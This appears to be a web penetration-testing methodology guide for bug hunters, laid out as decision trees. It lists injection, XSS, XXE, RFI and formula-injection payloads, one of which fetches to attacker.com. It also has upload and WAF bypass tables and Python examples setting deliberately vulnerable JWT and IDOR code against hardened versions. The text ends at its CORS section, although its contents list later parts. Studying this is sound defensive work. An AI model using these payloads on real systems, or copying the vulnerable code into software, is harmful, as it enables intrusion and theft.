The Master Attack Flow
A "choose your own adventure" methodology for web application penetration testing. Follow the decision trees to identify which vulnerabilities to test based on what you observe. Every path leads to specific methodologies and cheatsheets in this repository.
- How to Use This Flow
- Phase 1: Initial Reconnaissance
- Phase 2: Authentication & Session Attacks
- Phase 3: Input-Based Attacks
- Phase 4: Functionality-Based Attacks
- Phase 5: Infrastructure & Protocol Attacks
- Phase 6: Client-Side Attacks
- Phase 7: Chaining Vulnerabilities
- Quick Reference Matrix
Each section presents a scenario you might encounter during testing. Follow the branches:
```text
┌─────────────────────────┐
│    WHAT DO YOU SEE?     │
│                         │
│      [Observation]      │
└────────────┬────────────┘
             │
        ┌────┴─────────┐
        ▼              ▼
   ┌──────────┐  ┌────────────┐
   │   YES    │  │ NO → Move  │
   │  Test:   │  │ to next    │
   │  [Vuln]  │  │ section    │
   └──────────┘  └────────────┘
```
| Icon | Meaning |
|---|---|
| 🔴 | Critical: test immediately |
| 🟠 | High priority |
| 🟡 | Medium priority |
| 🟢 | Low priority / situational |
| 📋 | Checklist item |
| 📖 | Links to methodology |
| ⚡ | Quick win potential |
Prerequisites:
- Target is in scope for your bug bounty program
- You have explicit written authorization to test
- Reconnaissance is complete (subdomains mapped, live hosts identified)
- Technology stack is identified (use resources/cheatsheets/web-penetration.md)
Reference: Use Getting Started Guide for Bug Hunters to set up your environment before following this flow.
Before diving into specific attacks, map the application's surface area.
```text
┌─────────────────────────────────────────────────────────────┐
│               INITIAL APPLICATION ASSESSMENT                │
│                   "What am I looking at?"                   │
└──────────────────────────────┬──────────────────────────────┘
                               │
           ┌───────────────────┼───────────────────┐
           ▼                   ▼                   ▼
   ┌───────────────┐   ┌───────────────┐   ┌───────────────┐
   │  Modern SPA?  │   │  Traditional  │   │   API-Only    │
   │  (React, Vue, │   │ Server-Render │   │   Backend?    │
   │    Angular)   │   │  (PHP, .NET,  │   │    (REST,     │
   │               │   │    Rails)     │   │   GraphQL)    │
   └───────┬───────┘   └───────┬───────┘   └───────┬───────┘
           │                   │                   │
           ▼                   ▼                   ▼
   ┌───────────────┐   ┌───────────────┐   ┌───────────────┐
   │ Focus on:     │   │ Focus on:     │   │ Focus on:     │
   │ • API calls   │   │ • Forms       │   │ • Endpoints   │
   │ • JWT tokens  │   │ • Cookies     │   │ • Auth tokens │
   │ • CORS        │   │ • Sessions    │   │ • Rate limits │
   │ • CSP         │   │ • CSRF        │   │ • IDOR        │
   └───────────────┘   └───────────────┘   └───────────────┘
```

```text
┌─────────────────────────────────────────────────────────────┐
│                       RECON CHECKLIST                       │
└─────────────────────────────────────────────────────────────┘
📋 Crawl the application (use: Crawling and Fuzzing.md)
📋 Identify all endpoints and parameters
📋 Map API routes (use: API Penetration.md)
📋 Check for GraphQL endpoint (use: GraphQL.md)
📋 Identify tech stack (server, framework, CDN)
📋 Check for hidden vhosts (use: VHost.md)
📋 Look for exposed .git, .env, config files
📋 Check robots.txt, sitemap.xml for hidden paths
📋 Review JavaScript files for endpoints and secrets
📋 Test for broken links (use: Exploit Broken Links.md)
```
📖 Start Here: methodologies/web penetration/Crawling and Fuzzing. Before attacking, know your target.
Every application has authentication. These attacks exploit how users log in and stay logged in.
```text
┌─────────────────────────────────────────────────────────────┐
│                   AUTHENTICATION OBSERVED                   │
└───────────────────────────┬─────────────────────────────────┘
                            │
        ┌───────────────────┼───────────────────┬───────────────────┐
        ▼                   ▼                   ▼                   ▼
┌───────────────┐   ┌───────────────┐   ┌───────────────┐   ┌───────────────┐
│  Login Form   │   │  OAuth / SSO  │   │  JWT Tokens   │   │   MFA / 2FA   │
│    (Email/    │   │   (Google,    │   │    (Bearer    │   │  (TOTP, SMS,  │
│   Password)   │   │    GitHub,    │   │    tokens)    │   │     Push)     │
│               │   │     SAML)     │   │               │   │               │
└───────┬───────┘   └───────┬───────┘   └───────┬───────┘   └───────┬───────┘
        │                   │                   │                   │
        ▼                   ▼                   ▼                   ▼
```

```text
┌─────────────────────────────────────────────────────────────┐
│ LOGIN FORM → TEST FOR...                                    │
└─────────────────────────────────────────────────────────────┘
🔴 SQL INJECTION
├── Test: ' OR 1=1-- -, '; DROP TABLE users;--
├── 📖 SQL Injection.md
└── ⚡ Quick Win: Admin bypass with ' OR '1'='1

🔴 BRUTE FORCE
├── Test: Common passwords, username as password
├── 📖 Bruteforcing.md
└── ⚡ Quick Win: admin:admin, test:test, guest:guest

🟠 USERNAME ENUMERATION
├── Test: Different error messages for user vs password
├── Check: Response timing differences
└── Check: Password reset form reveals valid users

🟠 NOSQL INJECTION
├── Test: {"$gt":""}, {"$ne":null}
└── 📖 NoSQL Injection Vulnerabilities.md (web technologies)

🟡 SESSION FIXATION
├── Test: Does session token change after login?
└── 📖 Session Fixation.md

🟡 HTTP PARAMETER POLLUTION
├── Test: Duplicate parameters in login request
└── 📖 HTTP Parameter Pollution.md

🟢 RACE CONDITION ON LOGIN
├── Test: Concurrent login requests
└── 📖 Exploiting Race Conditions.md
```
Attack Sequence for Login Forms:
- First: Test for SQL Injection (highest impact)
- Then: Attempt brute force with common credentials
- Next: Check for username enumeration
- Finally: Test session handling after login
```text
┌─────────────────────────────────────────────────────────────┐
│ OAUTH / SSO → TEST FOR...                                   │
└─────────────────────────────────────────────────────────────┘
🟠 REDIRECT URI MANIPULATION
├── Test: redirect_uri=https://attacker.com
├── Test: redirect_uri=https://target.com.attacker.com
├── 📖 OAuth.md (web penetration)
└── 📖 OAuth Exploitation.md (web technologies)

🟠 AUTHORIZATION CODE INJECTION
├── Test: Inject attacker's code into victim's flow
└── 📖 OAuth.md

🟠 STATE PARAMETER MISSING
├── Test: CSRF on OAuth authorization request
└── 📖 CSRF.md

🟡 OPENID CONNECT MISCONFIGURATION
├── Test: ID token manipulation, alg:none
└── 📖 Open ID Connect.md

🟡 IMPLICIT GRANT EXPLOITATION
├── Test: Token leakage in URL fragments
└── 📖 OAuth Exploitation.md

🟢 SCOPE ESCALATION
├── Test: Add additional scopes to authorization request
└── 📖 OAuth.md
```
```text
┌─────────────────────────────────────────────────────────────┐
│ JWT TOKENS → TEST FOR...                                    │
└─────────────────────────────────────────────────────────────┘
🟠 ALGORITHM CONFUSION
├── Test: Change alg to "none", remove signature
├── Test: Change RS256 to HS256, sign with public key
└── 📖 JWT.md

🟠 SIGNATURE BYPASS
├── Test: Empty signature, invalid signature
└── 📖 JWT.md

🟠 KEY INJECTION
├── Test: jwk header, jku header, kid injection
└── 📖 JWT.md

🟡 TOKEN EXPIRY BYPASS
├── Test: Modify exp claim, use expired tokens
└── 📖 JWT.md

🟡 PRIVILEGE ESCALATION VIA CLAIMS
├── Test: Modify role, admin, scope claims
└── 📖 JWT.md + IDOR.md
```
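Why the algorithm-confusion, empty-signature and expiry items above succeed: the verifier lets the token choose its own algorithm and never looks at `exp`. Added example, not code from this repository: a verifier written that way beside one that pins the algorithm server-side. Standard library only; `SECRET`, the claims and the timestamps are constructed for the demo.

```python
import base64
import hashlib
import hmac
import json
import time
from typing import Optional

SECRET = b"constructed-demo-secret"  # constructed; a real service loads this from a secret store


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def mint(claims: dict, alg: str = "HS256", key: bytes = SECRET) -> str:
    """Build a compact JWT. alg="none" yields the unsigned form described in the
    ALGORITHM CONFUSION item: the header declares no algorithm, the signature is empty."""
    header = _b64url(json.dumps({"alg": alg, "typ": "JWT"}).encode())
    body = _b64url(json.dumps(claims).encode())
    if alg == "none":
        return f"{header}.{body}."
    sig = hmac.new(key, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{_b64url(sig)}"


def naive_verify(token: str, key: bytes = SECRET) -> Optional[dict]:
    """Vulnerable verifier: honours whatever alg the token declares and ignores exp.
    Any client can therefore mint an alg:none token carrying arbitrary claims."""
    header_b64, body_b64, sig_b64 = token.split(".")
    header = json.loads(_b64url_decode(header_b64))
    if header.get("alg") == "none":  # attacker-selected branch: no signature required
        return json.loads(_b64url_decode(body_b64))
    expected = hmac.new(key, f"{header_b64}.{body_b64}".encode(), hashlib.sha256).digest()
    if hmac.compare_digest(_b64url(expected), sig_b64):
        return json.loads(_b64url_decode(body_b64))
    return None


def strict_verify(token: str, key: bytes = SECRET, now: Optional[float] = None) -> Optional[dict]:
    """Hardened verifier: the server, not the token, decides the algorithm.
    Pinned to HS256 here; an RS256 deployment pins RS256 and hands only the
    public key to an RSA verify routine, so an HS256 header can never be
    checked against that key. Constant-time compare; exp mandatory and enforced."""
    parts = token.split(".")
    if len(parts) != 3 or not parts[2]:
        return None  # empty signature segment (SIGNATURE BYPASS item)
    header_b64, body_b64, sig_b64 = parts
    try:
        header = json.loads(_b64url_decode(header_b64))
        claims = json.loads(_b64url_decode(body_b64))
    except ValueError:  # covers bad base64 and bad JSON
        return None
    if header.get("alg") != "HS256":
        return None  # none, HS384, RS256, anything not pinned: rejected
    expected = hmac.new(key, f"{header_b64}.{body_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(_b64url(expected), sig_b64):
        return None
    now = time.time() if now is None else now
    exp = claims.get("exp")
    if not isinstance(exp, (int, float)) or exp < now:
        return None  # TOKEN EXPIRY BYPASS item: missing or past exp fails closed
    return claims
```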
```text
┌─────────────────────────────────────────────────────────────┐
│ MFA / 2FA → TEST FOR...                                     │
└─────────────────────────────────────────────────────────────┘
🟠 MFA BYPASS VIA DIRECT ENDPOINT ACCESS
├── Test: Access /dashboard directly without MFA
└── 📖 MFA-2FA Exploitation.md

🟠 MFA BYPASS VIA RESPONSE MANIPULATION
├── Test: Change 2fa_required:true to false
└── 📖 MFA-2FA Exploitation.md

🟡 MFA CODE BRUTE FORCE
├── Test: 000000-999999 (if no rate limiting)
└── 📖 Bruteforcing.md + MFA-2FA Exploitation.md

🟡 MFA FATIGUE / PUSH BOMBING
├── Test: Repeated push notifications
└── 📖 MFA-2FA Exploitation.md

🟢 BACKUP CODE ENUMERATION
├── Test: Predictable backup code format
└── 📖 MFA-2FA Exploitation.md
```
Every input field is an opportunity. This is the largest attack surface in any application.
```text
┌─────────────────────────────────────────────────────────────┐
│                     INPUT TYPE OBSERVED                     │
└───────────────────────────┬─────────────────────────────────┘
                            │
        ┌───────────────────┼───────────────────┬───────────────────┐
        ▼                   ▼                   ▼                   ▼
┌───────────────┐   ┌───────────────┐   ┌───────────────┐   ┌───────────────┐
│    Search     │   │     User-     │   │  API Request  │   │  File Upload  │
│ Bar / Filter  │   │ Supplied Data │   │  Parameters   │   │   Function    │
│               │   │   (Profile,   │   │    (REST,     │   │               │
│               │   │   Comments,   │   │   GraphQL)    │   │               │
│               │   │    Posts)     │   │               │   │               │
└───────┬───────┘   └───────┬───────┘   └───────┬───────┘   └───────┬───────┘
        │                   │                   │                   │
        ▼                   ▼                   ▼                   ▼
```

```text
┌─────────────────────────────────────────────────────────────┐
│ SEARCH / FILTER INPUT → TEST FOR...                         │
└─────────────────────────────────────────────────────────────┘
🔴 SQL INJECTION
├── Test: ' OR 1=1-- -, ' UNION SELECT 1,2,3--
├── 📖 SQL Injection.md
└── ⚡ Quick Win: Look for database errors

🔴 XSS (REFLECTED)
├── Test: <script>alert(1)</script>
├── Test: "><img src=x onerror=alert(1)>
├── 📖 xss.md
└── ⚡ Quick Win: Search term reflected in page?

🟠 COMMAND INJECTION
├── Test: ; id, | whoami, $(whoami)
└── 📖 Injection Exploitation.md

🟠 SSTI (TEMPLATE INJECTION)
├── Test: {{7*7}}, ${7*7}, <%= 7*7 %>
├── 📖 SSTI.md
└── ⚡ Quick Win: Math expressions evaluate?

🟡 LDAP INJECTION
├── Test: *)(uid=*))(|(uid=*
└── 📖 Injection Exploitation.md

🟡 XPATH INJECTION
├── Test: ' or '1'='1, '] | //user[name/text()='
└── 📖 Injection Exploitation.md
```
Differential Diagnosis for Search Bars:
| If You See... | It Might Be... | Test This |
|---|---|---|
| Database errors | SQL Injection | ' OR 1=1-- |
| Your input reflected in HTML | Reflected XSS | <script>alert(1)</script> |
| Math calculations executed | SSTI | {{7*7}} |
| System command output | Command Injection | ; whoami |
| LDAP error messages | LDAP Injection | *)(uid=* |
```text
┌─────────────────────────────────────────────────────────────┐
│ USER CONTENT (PROFILE, COMMENTS, POSTS) → TEST FOR...       │
└─────────────────────────────────────────────────────────────┘
🔴 STORED XSS
├── Test: <script>alert(document.cookie)</script>
├── Test: <img src=x onerror=fetch('https://attacker.com')>
├── 📖 xss.md
└── ⚡ Quick Win: Profile fields, comment sections

🔴 SQL INJECTION (SECOND-ORDER)
├── Test: Inject in profile, triggers on admin panel
└── 📖 SQL Injection.md

🟠 HTML INJECTION
├── Test: <h1>Test</h1>, <a href="https://evil.com">Click
└── 📖 xss.md (if script tags blocked)

🟠 FILE UPLOAD IN COMMENTS (if attachments allowed)
├── Test: Upload .php, .jsp, .asp as "image"
└── 📖 File Upload Vulnerabilities.md

🟡 CRLF INJECTION IN HEADERS (via user input)
├── Test: %0d%0aSet-Cookie: session=attacker
└── 📖 CRLF Injection.md

🟡 PROTOTYPE POLLUTION (if JavaScript-heavy app)
├── Test: __proto__[isAdmin]=true
└── 📖 Prototype Pollution.md
```
```text
┌─────────────────────────────────────────────────────────────┐
│ API PARAMETERS → TEST FOR...                                │
└─────────────────────────────────────────────────────────────┘
🔴 IDOR (INSECURE DIRECT OBJECT REFERENCE)
├── Test: Change /user/123 → /user/124
├── Test: Change ?id=123 → ?id=124
├── 📖 IDOR.md
└── ⚡ Quick Win: Sequential IDs, UUIDs in URLs

🟠 MASS ASSIGNMENT
├── Test: Add "role":"admin" to user update request
└── 📖 API Penetration.md

🟠 SSRF (if parameter contains URL)
├── Test: ?url=http://169.254.169.254/latest/meta-data
├── Test: ?redirect=http://attacker.com
└── 📖 SSRF.md

🟡 XXE (if XML input accepted)
├── Test: <!ENTITY xxe SYSTEM "file:///etc/passwd">
└── 📖 XXE Vulnerabilities.md

🟡 GRAPHQL-SPECIFIC ATTACKS
├── Test: Introspection query, batching, depth attacks
└── 📖 GraphQL.md

🟡 RACE CONDITION (if state-changing endpoint)
├── Test: Concurrent requests with same coupon code
└── 📖 Exploiting Race Conditions.md
```
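The IDOR and mass-assignment items above are the same missing server-side decision seen twice: who may touch this record, and which fields may the client set. Added example, not code from this repository: a profile-update handler written both ways over a constructed in-memory user table; `ALLOWED_UPDATE_FIELDS` is an assumption about which fields the application intends clients to edit.

```python
import copy
from typing import Any, Dict

# Constructed stand-in for the users table: two ordinary users and one admin.
SEED_USERS: Dict[int, Dict[str, Any]] = {
    123: {"id": 123, "email": "alice@example.test", "display_name": "alice", "role": "user"},
    124: {"id": 124, "email": "bob@example.test", "display_name": "bob", "role": "user"},
    1: {"id": 1, "email": "root@example.test", "display_name": "ops", "role": "admin"},
}
# Assumption: the only profile fields a client may set. Everything else
# (id, role, verification flags, ...) is server-owned.
ALLOWED_UPDATE_FIELDS = {"email", "display_name"}


def fresh_store() -> Dict[int, Dict[str, Any]]:
    return copy.deepcopy(SEED_USERS)


def vulnerable_update(store: Dict[int, Dict[str, Any]], actor_id: int,
                      target_id: int, payload: Dict[str, Any]) -> Dict[str, Any]:
    """PATCH /user/<target_id> as it is commonly written.
    IDOR: target_id comes from the URL and is never compared with the session user.
    Mass assignment: the JSON body is merged wholesale, so "role": "admin" sticks."""
    store[target_id].update(payload)
    return {"ok": True, "user": store[target_id]}


def hardened_update(store: Dict[int, Dict[str, Any]], actor_id: int,
                    target_id: int, payload: Dict[str, Any]) -> Dict[str, Any]:
    """Same endpoint with both decisions made explicit."""
    actor = store.get(actor_id)
    target = store.get(target_id)
    if actor is None or target is None:
        return {"ok": False, "error": "not_found"}
    # Object-level authorization: the record must belong to the session user,
    # or the session user must hold an explicit privilege. The URL id alone
    # proves nothing.
    if target_id != actor_id and actor["role"] != "admin":
        return {"ok": False, "error": "forbidden"}
    # Field allowlist: bind only what the client is meant to edit. Report the
    # rest so it can be logged; a body carrying "role" is itself a signal.
    rejected = sorted(set(payload) - ALLOWED_UPDATE_FIELDS)
    accepted = {k: v for k, v in payload.items() if k in ALLOWED_UPDATE_FIELDS}
    target.update(accepted)
    return {"ok": True, "user": target, "rejected_fields": rejected}
```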
```text
┌─────────────────────────────────────────────────────────────┐
│ FILE UPLOAD FUNCTION → TEST FOR...                          │
└─────────────────────────────────────────────────────────────┘
🔴 UNRESTRICTED FILE UPLOAD (RCE)
├── Test: Upload .php, .jsp, .aspx, .phtml, .php5
├── Test: Double extension: file.php.jpg
├── Test: Null byte: file.php%00.jpg
├── 📖 File Upload Vulnerabilities.md
└── ⚡ Quick Win: Web shell upload = immediate RCE

🔴 XXE VIA FILE UPLOAD (if XML/SVG/DOCX accepted)
├── Test: SVG with embedded XXE payload
├── Test: DOCX/XLSX XXE (Office Open XML)
└── 📖 XXE Vulnerabilities.md

🟠 XSS VIA FILE UPLOAD
├── Test: SVG with <script> tag, HTML file upload
└── 📖 xss.md

🟠 SSRF VIA FILE UPLOAD (if URL upload supported)
├── Test: Upload from URL pointing to internal services
└── 📖 SSRF.md

🟡 IMAGETRAGICK / GHOSTSCRIPT RCE
├── Test: Malicious image with ImageMagick payloads
└── 📖 File Upload Vulnerabilities.md

🟡 ZIP SLIP / PATH TRAVERSAL IN ARCHIVE
├── Test: Zip file with ../../../etc/passwd entry
└── 📖 LFI and RFI.md
```
File Upload Bypass Cheatsheet:
| Restriction | Bypass Technique |
|---|---|
| Extension blacklist | Try: .php5, .phtml, .pht, .php., .PhP, .pHp |
| MIME type check | Change Content-Type: image/jpeg → text/php |
| Content validation | Add GIF89a; header before PHP code |
| Image-only check | Create polyglot image/webshell with exiftool |
| Server renames file | Check for LFI to include uploaded file |
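Every row of the bypass table is a server-side check that was missing. Added example, not code from this repository: one validator that closes each row, with a constructed magic-byte table; the size limit and the set of accepted image types are assumptions.

```python
import secrets
from typing import Dict, Tuple

# Constructed table: extension the server will store -> magic bytes it must start with.
ALLOWED: Dict[str, Tuple[bytes, ...]] = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
MAX_BYTES = 5 * 1024 * 1024  # assumption
SCRIPT_MARKERS = (b"<?php", b"<script")  # polyglot tell-tales; re-encoding through an image library is stronger


def validate_upload(filename: str, content_type: str, data: bytes) -> Tuple[bool, str]:
    """Return (False, reason) or (True, stored_name).

    Row by row against the bypass table:
      Extension blacklist -> allowlist on the LAST suffix, lower-cased
                             (.php5, .phtml, .PhP and "file.php." all fail)
      MIME type check     -> the client's Content-Type is never a decision input
      Content validation  -> magic bytes must match the extension AND no script markers
      Image-only check    -> same; a GIF89a prefix over PHP is caught by the marker scan
      Server renames file -> stored name is random, so nothing user-chosen reaches disk
    """
    if "\x00" in filename or "/" in filename or "\\" in filename:
        return False, "control character or path separator in filename"  # file.php%00.jpg, traversal
    base, dot, ext = filename.rpartition(".")
    if not dot or not base or not ext:
        return False, "missing extension"  # ".htaccess", "file.php."
    ext = ext.lower()
    if ext not in ALLOWED:
        return False, f"extension .{ext} not allowed"
    if "." in base:
        return False, "multiple extensions"  # file.php.jpg: refuse rather than trust the web server's handler order
    if len(data) > MAX_BYTES:
        return False, "too large"
    if not any(data.startswith(magic) for magic in ALLOWED[ext]):
        return False, f"content is not a {ext}"  # Content-Type said image; the bytes disagree
    if any(marker in data for marker in SCRIPT_MARKERS):
        return False, "script markers inside image"  # polyglot built with exiftool or a GIF89a prefix
    # content_type is deliberately unused for the decision. Log a mismatch with
    # the detected type as a signal, but never let it grant anything.
    return True, f"{secrets.token_hex(16)}.{ext}"
```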
Beyond inputs, application functions themselves can be vulnerable.
```text
┌─────────────────────────────────────────────────────────────┐
│                   FUNCTIONALITY OBSERVED                    │
└───────────────────────────┬─────────────────────────────────┘
                            │
        ┌───────────────────┼───────────────────┬───────────────────┐
        ▼                   ▼                   ▼                   ▼
┌───────────────┐   ┌───────────────┐   ┌───────────────┐   ┌───────────────┐
│ URL/Redirect  │   │     Email     │   │ Import/Export │   │   WebSocket   │
│  Parameters   │   │ Functionality │   │ Functionality │   │  Connections  │
│               │   │               │   │               │   │               │
└───────┬───────┘   └───────┬───────┘   └───────┬───────┘   └───────┬───────┘
        │                   │                   │                   │
        ▼                   ▼                   ▼                   ▼
```

```text
┌─────────────────────────────────────────────────────────────┐
│ URL / REDIRECT PARAMETERS → TEST FOR...                     │
└─────────────────────────────────────────────────────────────┘
🔴 SSRF (if parameter fetches URLs)
├── Test: Internal IPs, cloud metadata, localhost
└── 📖 SSRF.md

🔴 OPEN REDIRECT
├── Test: ?redirect=https://evil.com
├── Test: ?next=//evil.com, ?url=https:evil.com
└── 📖 Open Redirect.md

🟠 LFI/RFI (if parameter includes files)
├── Test: ?page=../../../../etc/passwd
├── Test: ?page=https://evil.com/shell.php
└── 📖 LFI and RFI.md

🟡 DNS REBINDING (if URL is validated then used)
├── Test: Domain that resolves to different IPs
└── 📖 DNS Rebinding.md

🟡 HTTP PARAMETER POLLUTION
├── Test: ?url=good.com&url=evil.com
└── 📖 HTTP Parameter Pollution.md
```
```text
┌─────────────────────────────────────────────────────────────┐
│ EMAIL FUNCTIONALITY → TEST FOR...                           │
└─────────────────────────────────────────────────────────────┘
🟠 EMAIL HEADER INJECTION
├── Test: Bcc: victim@company.com in email field
└── 📖 Email Attacks.md

🟠 EMAIL SPOOFING (if app sends emails on user's behalf)
├── Test: From: CEO <ceo@company.com>
└── 📖 Email Attacks.md

🟡 SSRF IN EMAIL TEMPLATES (if external images fetched)
├── Test: <img src="http://169.254.169.254/">
└── 📖 SSRF.md

🟡 SSTI IN EMAIL TEMPLATES
├── Test: {{7*7}} in email body or subject
└── 📖 SSTI.md
```
```text
┌─────────────────────────────────────────────────────────────┐
│ IMPORT / EXPORT → TEST FOR...                               │
└─────────────────────────────────────────────────────────────┘
🟠 XXE IN IMPORT (XML, DOCX, XLSX)
├── Test: Upload XML with external entity
└── 📖 XXE Vulnerabilities.md

🟠 CSV/EXCEL FORMULA INJECTION
├── Test: =cmd|'/C calc'!A0 in exported CSV
└── 📖 Injection Exploitation.md

🟡 DESERIALIZATION IN IMPORT (if serialized objects)
├── Test: Malicious serialized Java/PHP/Python object
└── 📖 Deserialization.md

🟡 IDOR IN EXPORT (export other users' data)
├── Test: Change export ID parameter
└── 📖 IDOR.md
```
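The CSV/Excel formula injection item above is an export-side bug: the application writes user-controlled text into a file that a spreadsheet will evaluate. Added example, not code from this repository: the neutralisation applied when writing an export, and the matching scan on an import, over constructed rows.

```python
import csv
import io
from typing import Iterable, List, Tuple

# A cell starting with one of these is evaluated as a formula by Excel,
# LibreOffice and Google Sheets. Tab and CR are included because some
# spreadsheets strip them before deciding.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def neutralise_cell(value: object) -> str:
    """Prefix a single quote so the spreadsheet treats the cell as text.
    Known cost: a bare negative number such as "-5" is quoted too; emit
    numeric columns as numbers rather than strings if that matters.
    Embedded commas, quotes and newlines are left to csv.writer, which
    quotes them."""
    text = "" if value is None else str(value)
    if text.startswith(FORMULA_TRIGGERS):
        return "'" + text
    return text


def export_rows(rows: Iterable[List[object]]) -> str:
    """Serialise rows to CSV text with every cell neutralised."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([neutralise_cell(cell) for cell in row])
    return buf.getvalue()


def suspicious_cells(csv_text: str) -> List[Tuple[int, int, str]]:
    """Import-side detection: (row, column, value) for every cell that would
    evaluate as a formula if the file were opened as-is. Log or reject on hits."""
    hits = []
    for r, row in enumerate(csv.reader(io.StringIO(csv_text))):
        for c, cell in enumerate(row):
            if cell.startswith(FORMULA_TRIGGERS):
                hits.append((r, c, cell))
    return hits
```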
```text
┌─────────────────────────────────────────────────────────────┐
│ WEBSOCKET CONNECTIONS → TEST FOR...                         │
└─────────────────────────────────────────────────────────────┘
🟠 CROSS-SITE WEBSOCKET HIJACKING
├── Test: No Origin validation, missing CSRF token
└── 📖 WebSocket Exploitation.md

🟠 UNAUTHORIZED MESSAGE MANIPULATION
├── Test: Modify message content to impersonate users
└── 📖 WebSocket Exploitation.md

🟡 IDOR IN WEBSOCKET MESSAGES
├── Test: Change user_id in WebSocket message
└── 📖 IDOR.md + WebSocket Exploitation.md

🟡 RACE CONDITION IN REAL-TIME APPS
├── Test: Rapid message sending for duplicate actions
└── 📖 Exploiting Race Conditions.md
```
Attacks that target the underlying infrastructure rather than application logic.
```text
┌─────────────────────────────────────────────────────────────┐
│                    INFRASTRUCTURE CLUES                     │
└───────────────────────────┬─────────────────────────────────┘
                            │
        ┌───────────────────┼───────────────────┬───────────────────┐
        ▼                   ▼                   ▼                   ▼
┌───────────────┐   ┌───────────────┐   ┌───────────────┐   ┌───────────────┐
│   CDN / WAF   │   │ Load Balancer │   │ Cache Headers │   │ Supply Chain  │
│   Detected    │   │    / Proxy    │   │   (Varnish,   │   │  (npm, pip,   │
│               │   │   Detected    │   │  CloudFront)  │   │   composer)   │
└───────┬───────┘   └───────┬───────┘   └───────┬───────┘   └───────┬───────┘
        │                   │                   │                   │
        ▼                   ▼                   ▼                   ▼
```

```text
┌─────────────────────────────────────────────────────────────┐
│ WAF/CDN PRESENT → TEST FOR...                               │
└─────────────────────────────────────────────────────────────┘
🔴 WAF BYPASS TECHNIQUES
├── Test: Encoding, obfuscation, fragmentation
└── 📖 WAF.md (web technologies)

🟠 ORIGIN IP DISCLOSURE
├── Test: DNS history, certificate transparency, censys
└── 📖 WAF.md

🟠 HTTP REQUEST SMUGGLING
├── Test: CL.TE, TE.CL, TE.TE desync
├── 📖 HTTP Request Smuggling.md
└── ⚡ Quick Win: If front-end/back-end mismatch

🟡 WEB CACHE DECEPTION
├── Test: /account.css → cached with sensitive content
└── 📖 Web Cache Deception.md

🟡 WEB CACHE POISONING
├── Test: Unkeyed headers (X-Forwarded-Host)
└── 📖 Web Cache Deception.md

🟢 CSP BYPASS (if CSP header present)
├── Test: Script gadgets, JSONP endpoints, CDN whitelist
└── 📖 csp.md
```
WAF Bypass Quick Reference:
| Technique | Example |
|---|---|
| Case variation | <ScRiPt>alert(1)</sCrIpT> |
| Encoding | %3Cscript%3Ealert(1)%3C/script%3E |
| Double URL encoding | %253Cscript%253E |
| Null bytes | <scri%00pt>alert(1)</script> |
| Fragmentation | Send headers in separate packets |
| HTTP Parameter Pollution | `?id=1&id=2` (bypasses WAF regex) |
| Alternative syntax | `` `id` `` instead of `;id` |
```text
┌─────────────────────────────────────────────────────────────┐
│ LOAD BALANCER → TEST FOR...                                 │
└─────────────────────────────────────────────────────────────┘
🔴 HTTP REQUEST SMUGGLING
├── Test: CL.TE, TE.CL desync between LB and backend
└── 📖 HTTP Request Smuggling.md

🟠 HOST HEADER INJECTION
├── Test: X-Forwarded-Host: evil.com
└── 📖 header-injection.md

🟡 PATH CONFUSION / ROUTING BYPASS
├── Test: /admin → //admin → /ADMIN → /;/admin
└── 📖 HTTP Request Smuggling.md
```
```text
┌─────────────────────────────────────────────────────────────┐
│ CACHE HEADERS → TEST FOR...                                 │
└─────────────────────────────────────────────────────────────┘
🟠 WEB CACHE DECEPTION
├── Test: /profile.css, /settings.json caching sensitive
└── 📖 Web Cache Deception.md

🟠 WEB CACHE POISONING
├── Test: Unkeyed headers, fat GET requests
└── 📖 Web Cache Deception.md

🟡 CLICKJACKING (if cache serves attacker's page)
├── Test: Cache attacker content at victim URL
└── 📖 Clickjacking.md
```
```text
┌─────────────────────────────────────────────────────────────┐
│ SUPPLY CHAIN INDICATORS → TEST FOR...                       │
└─────────────────────────────────────────────────────────────┘
🟠 DEPENDENCY CONFUSION
├── Test: Internal package names → publish to public repo
└── 📖 Supply Chain Attack.md

🟠 EXPOSED SECRETS (GitHub, GitLab)
├── Test: Search repo for .env, credentials, API keys
└── 📖 GitHub Security.md + GitLab.md

🟡 CI/CD PIPELINE EXPLOITATION
├── Test: Exposed Jenkins, GitHub Actions injection
└── 📖 CI-CD Security.md + Jenkins.md

🟡 TYPOSQUATTING (if app uses public packages)
├── Test: Look for packages with similar names
└── 📖 Supply Chain Attack.md
```
Attacks that target the user's browser rather than the server.
```text
┌─────────────────────────────────────────────────────────────┐
│                    CLIENT-SIDE BEHAVIOR                     │
└───────────────────────────┬─────────────────────────────────┘
                            │
        ┌───────────────────┼───────────────────┬───────────────────┐
        ▼                   ▼                   ▼                   ▼
┌───────────────┐   ┌───────────────┐   ┌───────────────┐   ┌───────────────┐
│ Cross-Origin  │   │   Frames /    │   │  CSP Header   │   │  JavaScript   │
│   Requests    │   │    Iframes    │   │    Present    │   │   Heavy App   │
│    (CORS)     │   │               │   │               │   │               │
└───────┬───────┘   └───────┬───────┘   └───────┬───────┘   └───────┬───────┘
        │                   │                   │                   │
        ▼                   ▼                   ▼                   ▼
```

```text
┌─────────────────────────────────────────────────────────────┐
│ CORS → TEST FOR...                                          │
└─────────────────────────────────────────────────────────────┘
🟠 ORIGIN REFLECTION
├── Test: Origin: https://evil.com → reflected in ACAO
└── 📖 CORS.md

🟠 NULL ORIGIN ALLOWED
├── Test: Origin: null → ACAO: null
└── 📖 CORS.md

🟠 SUBDOMAIN ORIGIN BYPASS
├── Test: Origin: https://evil.target.com
└── 📖 CORS.md

🟡 PREFLIGHT BYPASS
├── Test: Simple request that doesn't trigger preflight
└── 📖 CORS.md
```
